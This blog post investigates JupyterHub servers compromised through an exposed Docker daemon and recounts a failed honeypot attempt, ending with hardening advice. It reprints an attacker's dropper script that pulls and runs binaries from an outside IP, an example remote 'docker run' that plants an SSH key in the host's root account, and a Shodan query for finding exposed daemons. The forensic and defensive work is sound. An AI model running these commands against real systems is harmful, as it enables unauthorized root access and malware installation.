Docker Security Woes

By Jordan Rodgers

 

The other month at work, we found a few systems that were compromised. The systems were part of a JupyterHub setup and were hosting Jupyter notebooks within Docker containers. JupyterHub uses the Docker daemon with Swarm to spin up new containers (an example guide for how it was set up can be found here: https://zonca.github.io/2016/05/jupyterhub-docker-swarm.html). This means the Docker daemon has to listen on a network port on every node so the master can send it Docker commands. That, in conjunction with a few other misconfigurations, led to all of the nodes being compromised.

The Initial Plan

I figured I could replicate the misconfiguration that got them compromised on a few systems of my own to create a simple honeypot, letting me see how else the systems would be compromised and what the compromised systems would be used for. I started out with two VMs, one running CentOS 7 and one running Ubuntu 16.04.2. The first thing I did was disable SELinux and AppArmor. Next, I configured the Docker daemon to listen on the default port (2375).

To set up the Docker daemon on CentOS to listen on port 2375, I had to add the following to the end of OPTIONS in /etc/sysconfig/docker:

-H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375

To set up the Docker daemon on Ubuntu to listen on port 2375, I had to remove the following from the ExecStart line in /etc/systemd/system/multi-user.target.wants/docker.service:

-H fd://

Also, I had to add the following to /etc/docker/daemon.json:

{
    "hosts": ["fd://", "tcp://0.0.0.0:2375"]
}

I disabled the firewall on both systems and checked to make sure I could remotely manage the Docker daemon on each of them. And then I waited…
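For reference, checking that the daemon is manageable remotely is just a matter of pointing a Docker client at each box over TCP, something along these lines (the hostnames here are placeholders for my two VMs):

# Point a remote Docker client at each honeypot over TCP
docker -H tcp://centos-honeypot:2375 info
docker -H tcp://ubuntu-honeypot:2375 ps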

What Went Wrong

In my draft for this blog post, I had “Within X time they had already been compromised!” ready to go, assuming it would take hardly any time at all for the systems to be compromised. To my surprise, neither of them was ever compromised over the course of the three weeks I had them open to the world.

I’m not quite sure why they weren’t compromised. One idea I have is that the version of Docker I used was the one available in the distribution repositories, which is outdated. If scanners in the wild were attempting to use the Docker Python client to interact with my daemons, they wouldn’t have been able to: many operations in the Docker Python client fail if the server is running a version of Docker older than 1.15, and mine were running 1.12.6.
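If you want to see what a remote daemon reports about itself (which is presumably what a scanner would key off of before deciding how to talk to it), the API will happily tell you without any client library at all; something like this, with the host as a placeholder:

# The /version endpoint reports the Docker version and the API version it speaks
curl http://<host>:2375/version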

Unfortunately, my attempt at getting my misconfigured Docker systems to be compromised was a failure. So I figured I would take this time to go over the discovery and forensics process of the compromised systems from my work.

Discovery/Forensics of the Compromised Systems

A few months ago, one of my co-workers got into work and was looking at his JupyterHub setup. He went in to update Docker on one of the nodes and observed a strange error. Looking online, he was able to find a page that said all he had to do was delete a file “/etc/init.d/DbSecuritySpt” in order to fix it. Curious, he looked online for more information about the file and ran across this page: http://blogg.openend.se/2014/3/2/malware-under-linux.

It essentially goes over how someone discovered their system had been compromised and was being used as part of a DDoS attack. At this point, he told me what he had found on the system, and we started investigating whether and how our systems had been compromised.

The first thing we looked at was the “/etc/init.d/DbSecuritySpt” file. It was just a script that executed a binary at “/root/pak”. When we looked at the bash history, we found the following lines of interest:

34  chattr -i /usr/bin/wget
35  chmod u+x /usr/bin/wget
36  wget 43.230.145.166:566/a
37  chmod u+x a
38  ./a
39  exit

It looks like the attacker removed the immutable attribute from wget and made it executable, pulled down a file named “a”, and then executed it.

Here were the contents of the “a” file:

chattr + .bash_history
wget -P /etc/ 43.230.145.166:566/iptabt
chmod u+x  /etc/iptabt
chattr +i  /etc/iptabt
/etc/iptabt

wget 43.230.145.166:566/2017
chmod u+x 2017
./2017

chattr +i /root/.ssh/authorized_keys
chattr +i /etc/crontab
chattr +i /mnt
chattr +i /etc/cron.hourly

rm -rf a

iptables -I INPUT -s 192.168.0.0/16 -p tcp --dport 2375 -j ACCEPT
iptables -I INPUT -s 172.0.0.0/8 -p tcp --dport 2375 -j ACCEPT
iptables -I INPUT -s 10.0.0.0/8 -p tcp --dport 2375 -j ACCEPT
iptables -I INPUT -s 121.12.119.0/24 -p tcp --dport 2375 -j ACCEPT
iptables -I INPUT -s 111.74.0.0/16 -j DROP
iptables -I INPUT -s 64.34.0.0/16 -j DROP
iptables -I INPUT -s 183.131.0.0/16 -j DROP
sudo apt-get update

sudo apt-get install iptables-persistent

There is some fun stuff in that script. I’m not really going to focus on what the attacker did with the system, but rather how they actually got in. So how did someone manage to execute the commands as root that we saw in the bash history? I figured the next step would be to examine the authentication logs to see if there were any logins from strange IP addresses:

[Screenshot: authentication log showing an unfamiliar root SSH login]
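For anyone following along, the check itself is just a grep through the SSH daemon's log; which file it lives in depends on the distribution:

# Debian/Ubuntu
grep 'Accepted' /var/log/auth.log
# RHEL/CentOS
grep 'Accepted' /var/log/secure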

Sure enough, there was a successful root login. The interesting part was that it was a login using an SSH key… How did someone manage to get their SSH key on the system? Checking out the authorized_keys file, there was in fact a key there that didn’t belong to any of us:

[Screenshot: root's authorized_keys file containing an unknown SSH key]

Weird… I figured I would check when the file was last modified:

[Screenshot: access, modify, and change times of root's authorized_keys file]
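That check is nothing more than a stat of the file, which reports the access, modify, and change times:

stat /root/.ssh/authorized_keys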

Sure enough, the modify time was about 7 seconds before the root login. Things were starting to make a little more sense, but how did the SSH key get there?

We poked around a few more areas for a little while before finally looking at Docker. A quick container list yielded some promising results:

[Screenshot: container listing showing two unrecognized containers]
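The listing itself is nothing fancy; the -a flag includes containers that have already exited:

docker ps -a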

Those were containers my co-worker didn’t recognize! Using the Docker logs, we attempted to check what those containers actually did when they ran:

[Screenshot: logs from the first unrecognized container, attempting to modify crontab]
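docker logs just takes a container name or ID, both of which show up in the listing above (the ID here is a placeholder):

docker logs <container-id>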

The first unrecognized one was trying to do something with crontab, but it didn’t look like it succeeded… Then we checked the next one:

[Screenshot: logs from the second unrecognized container, writing an SSH key to a path under /mnt]

Bingo! Someone launched a container and added the key to… a directory under /mnt? What was mounted there?

Using the Docker inspect command, we could find out all sorts of cool details about the container, including this one:

[Screenshot: docker inspect output showing the host's / mounted into the container]
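If you only care about the mounts, you can filter the inspect output down to just that section (the container ID here is a placeholder):

docker inspect --format '{{json .Mounts}}' <container-id>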

They literally mounted the root of the filesystem in the container… The authorized_keys file that the container added an SSH key to was actually the authorized_keys file of the root user on the host system. Neat.

Just to confirm, I checked the time that the container was created:

[Screenshot: container creation time from docker inspect]
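Again, inspect will hand you just the field you want:

docker inspect --format '{{.Created}}' <container-id>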

Sure enough, it was 9 seconds before the authorized_keys file was modified and 16 seconds before the root login occurred.

So far, we know that the attacker launched a container, mounted the root of the filesystem under /mnt, and wrote an SSH key to the authorized_keys file of the root user. Then, they logged in using the SSH key, ran a command that pulled down their malicious script, and then got off the system (at least off of SSH).

The final question: how did they create the container? After searching around for quite some time and talking with my co-worker about how he had set everything up, I finally came across a configuration in Docker that threw a warning sign:

[Screenshot: Docker daemon configuration showing it listening on a network interface via -H]

(IP addresses have been redacted)

The -H option for the Docker daemon tells it to listen on a specific socket or port. Usually, it is set to the Docker socket on the local host, as you might have seen near the beginning of this post:

-H unix:///var/run/docker.sock

So why was Docker configured on this system to listen on an actual network interface? My co-worker explained that this was how JupyterHub managed Docker to deploy the necessary containers. A quick look at iptables showed that there were no rules at all, not even an implicit deny. The entire world could connect to this system's Docker daemon and do anything. My co-worker did mention that he had firewall rules, but he applied them manually every time the system restarted… We had been having some issues with our VM infrastructure, so it is likely this specific VM rebooted without his knowledge. AppArmor or SELinux should have prevented Docker from mounting the root of the filesystem and manipulating the root user's authorized_keys file, but unfortunately neither of those was configured either.
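We never recovered the exact command the attacker ran, but with the daemon exposed like that, the whole attack boils down to a single remote docker run; something along these lines, where the address, image, and key are all made up for illustration:

# Launch a throwaway container on the victim's daemon with the host's / mounted at /mnt,
# then append an attacker-controlled key to root's authorized_keys on the host
docker -H tcp://victim.example.com:2375 run --rm -v /:/mnt busybox \
    sh -c 'echo "ssh-rsa AAAA... attacker@evil" >> /mnt/root/.ssh/authorized_keys'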

So that was it. A firewall misconfiguration, insecure Docker configuration, and no proper mandatory access control system led to the entire box being compromised. I haven’t had a chance to take a closer look at the binaries that were placed on the system, but I plan to in the future.

How Common Is This?

When I was poking around on Shodan (https://www.shodan.io/), I found all of the systems from work that had been compromised, and they all showed the Docker daemon port (2375) open. After a bit of trial and error, I was able to find a Shodan search query for open Docker daemons:

port:2375 HTTP/1.1 404 Not Found Content-Type: application/json

As of this writing, there were 327 results:

[Screenshot: Shodan search results for open Docker daemons]

The very first result I tried did in fact have an open Docker daemon:

[Screenshot: an open Docker daemon on the first Shodan result]

It amazed me just how many other systems had this problem, especially since someone has to intentionally configure Docker to listen on a network interface for it to be exposed like this.

A Tool to Help

I looked around and didn’t find many tools available that would check and/or exploit a system with this specific misconfiguration, so I figured I would go ahead and write one:

https://github.com/com6056/docker-daemon-checker

Currently, it assumes the target system has SELinux installed. It will check whether the daemon port is open, check the SELinux status of the host through a container, and optionally exploit the host by adding an SSH key of the user's choosing to root's authorized_keys.

 

Here is the output from it running against the CentOS 7 system that I set up as part of the honeypot:

[Screenshot: output of the tool running against the CentOS 7 honeypot]

As soon as my script finished, I could log in to the root account on the system using my SSH key:

[Screenshot: SSH login as root using the newly added key]

In the future, I plan to add support for systems that have AppArmor as well as systems that don’t have any sort of mandatory access control system. I also want to add the ability to scan and/or exploit multiple systems at a time.

Conclusion

In conclusion, Docker is an amazing piece of technology that has revolutionized how we deploy modern applications. It is also a dark and scary technology that has the ability to ruin your day. Be careful with it. Ensure you don't have the Docker daemon listening on an actual network interface (which it shouldn't by default). Use SELinux or AppArmor if you can, as they can really save the day if you do happen to misconfigure something. Last but not least, firewalls are your friend and should be checked for misconfigurations periodically.
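A quick sanity check on your own hosts is to see whether the daemon is listening on a TCP port at all, and if it genuinely has to be, to make sure the firewall restricts who can reach it; for example (the allowed subnet below is just an example):

# Is anything listening on the Docker daemon port?
ss -lntp | grep 2375

# If the port has to stay open, at least drop traffic from everywhere except a trusted subnet
iptables -I INPUT -p tcp --dport 2375 ! -s 10.0.0.0/8 -j DROP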

 

Happy containerizing!
